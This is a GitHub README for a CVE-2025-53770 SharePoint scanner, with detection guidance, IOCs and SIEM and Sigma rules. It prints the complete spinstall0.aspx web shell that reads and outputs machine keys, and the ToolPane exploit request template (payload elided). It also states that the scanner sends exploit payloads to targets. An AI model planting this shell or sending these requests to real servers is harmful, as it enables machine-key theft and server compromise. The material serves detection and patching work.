Skip to content

ZephrFish/CVE-2025-53770-Scanner

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
README.md
README.md
 
 
config.json
config.json
 
 
requirements.txt
requirements.txt
 
 
scanner.py
scanner.py
 
 

Repository files navigation

CVE-2025-53770 SharePoint Vulnerability Scanner

100% hacked together with all the tweets floating around with payloads and different attacks, so comes with zero warranty etc. The scanner is designed to identify vulnerable instances and has a config with known uses in the wild of exploitation, it's primarily designed for defensive use to identify vulnerable instances and allow you to patch things.

This scanner performs automated checks of SharePoint deployments by:

  • Sending crafted POST requests to SharePoint ToolPane endpoints with exploit payloads
  • Detecting machine key extraction attempts and successful exploitation
  • Identifying secondary payload deployment (spinstall0.aspx)
  • Analyzing responses for vulnerability indicators based on observed attack patterns
  • Providing detailed reporting with confidence levels and immediate action alerts
  • Supporting concurrent scanning for efficiency

Key Detection Capabilities

CRITICAL: Machine Key Extraction Detection

  • Detects successful machine key extraction responses
  • Identifies ValidationKey, DecryptionKey, and CompatibilityMode exposure
  • Recognizes pipe-delimited machine key patterns (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Triggers immediate action alerts for compromised systems

Secondary Payload Detection

  • Identifies spinstall0.aspx deployment attempts
  • Detects C# ASP.NET payload code patterns
  • Recognizes System.Web.Configuration.MachineKeySection usage
  • Version-specific path detection (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Installation

  1. Clone the repository:
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Install dependencies:
pip install -r requirements.txt

Usage

Basic Usage

Create a text file with target hosts (one per line):

sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Run the scanner:

python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Command Line Options

Option Description Default
-i, --input Path to host list file (required) -
-o, --output Output file for results (.json, .csv, .txt) None
-l, --logfile Log file path for detailed logging None
-t, --threads Number of concurrent threads 10
-v, --verbose Enable verbose output and logging False

Output Formats

JSON Output (-o results.json)

[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

CSV Output (-o results.csv)

Provides tabular data suitable for spreadsheet analysis with columns for all scan metrics.

Text Output (-o results.txt)

Human-readable format with vulnerability status and scan details.

Vulnerability Details

CVE-2025-53770 targets a deserialization vulnerability in SharePoint's ExcelDataSet component that has been actively exploited in the wild. The scanner detects:

Identified Attack Patterns

  1. Initial Exploitation: POST request to /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx with serialized payload
  2. Machine Key Extraction: Successful exploitation returns pipe-delimited machine configuration: 
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
  3. Secondary Payload: Deployment of spinstall0.aspx for persistent access and key extraction
  4. Version Targeting: Different paths for SharePoint versions (15/ vs 16/ layouts)

Confirmed IOCs from Active Exploitation

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Typically 7699-8000+ bytes
  • Payload Size: Large base64-encoded CompressedDataTable parameters
  • Response Indicators: Machine key strings, spinstall0.aspx deployment
  • Attack Infrastructure: 65.38.121.198, 162.243.204.189, 165.22.18.129

Detection Logic

The scanner analyzes responses for:

  1. Machine key extraction patterns (CRITICAL confidence)
  2. Secondary payload indicators (HIGH confidence)
  3. ExcelDataSet/Scorecard component processing (MEDIUM confidence)
  4. ToolPane error patterns and anomalous response characteristics (LOW confidence)

Security Considerations

  • This tool is designed for authorized security testing only
  • Ensure proper authorization before scanning any systems
  • Scanner uses HTTPS by default but accepts self-signed certificates
  • Logs may contain sensitive information - secure appropriately
  • Consider network impact when using high thread counts

Example Scan Session

$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

Troubleshooting

Common Issues

  1. Connection Timeouts: Increase timeout or reduce thread count
  2. SSL Errors: Scanner disables SSL warnings by default
  3. Permission Errors: Ensure write access for output/log files
  4. Memory Usage: Monitor with large host lists

Log Analysis

Enable verbose logging (-v) and log files (-l) for detailed troubleshooting:

tail -f scan.log

Exploitation Analysis

Observed Attack Payloads

The scanner incorporates detection for confirmed exploitation patterns observed in active attacks:

Primary Payload Structure

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

Secondary Payload (spinstall0.aspx)

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Expected Machine Key Response Format

ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Detection and Monitoring Guidance

Detecting CVE-2025-53770 Exploitation Attempts

Organizations should implement the following detection mechanisms to identify potential exploitation attempts:

1. Web Application Firewall (WAF) Rules

Monitor for suspicious POST requests to SharePoint ToolPane endpoints:

# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

exploitation patterns observed:

  • Payload sizes typically 7000-8000+ bytes
  • URL-encoded compressed data in CompressedDataTable parameter
  • Specific User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Connection: close header often present
  • Base64-encoded serialized .NET objects in payload
  • Response contains machine keys in pipe-delimited format
  • Secondary requests to deployed spinstall0.aspx files

2. SharePoint ULS Logs

Monitor SharePoint Unified Logging Service (ULS) logs for:

Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

Key indicators in ULS logs:

  • Unexpected exceptions in ToolPane.aspx processing
  • Deserialization errors in Microsoft.PerformancePoint components
  • Memory corruption or process crashes in w3wp.exe

3. IIS Access Logs

Monitor IIS logs for exploitation patterns:

# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

Specific IOCs from real attacks:

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Network Traffic Analysis

Monitor network traffic for:

  • Unusual POST request sizes to SharePoint servers
  • Repeated requests to ToolPane.aspx from single sources
  • Base64 encoded payloads in HTTP POST bodies
  • Non-browser User-Agent strings targeting SharePoint

5. Windows Event Logs

Monitor Windows Event Logs on SharePoint servers:

Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. SIEM Detection Rules

Splunk Detection Query:
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Enhanced Detection for Real Attacks:
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Elastic/Kibana Query:
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Sigma Rule for CVE-2025-53770:
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Behavioral Indicators

Watch for these post-exploitation behaviors:

  • Unusual outbound network connections from SharePoint servers
  • New user accounts created in SharePoint or Active Directory
  • Unauthorized file uploads or modifications
  • Privilege escalation attempts
  • Lateral movement to other systems

Recommended Response Actions

  1. Immediate Response:

    • Block suspicious source IPs at firewall/WAF
    • Isolate affected SharePoint servers if exploitation confirmed
    • Preserve logs and memory dumps for forensic analysis

  2. Investigation:

    • Analyze POST request payloads for malicious content
    • Check for indicators of successful code execution
    • Review user account activities and permissions changes
    • Correlate with other security events

  3. Containment:

    • Apply security patches immediately
    • Implement WAF rules to block exploitation attempts
    • Segment SharePoint servers from critical network resources

SIEM Integration Examples

Importing Scan Results into Splunk:

# Convert scan results for Splunk ingestion
python3 scanner.py -i hosts.txt -o results.json
# Import into Splunk index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json

About

ToolShell scanner - CVE-2025-53770 and detection information

Topics

toolshell cve-2025-53770

Resources

Readme
Activity

Stars

18 stars

Watchers

0 watching

Forks

5 forks
Report repository

Contributors 1

Languages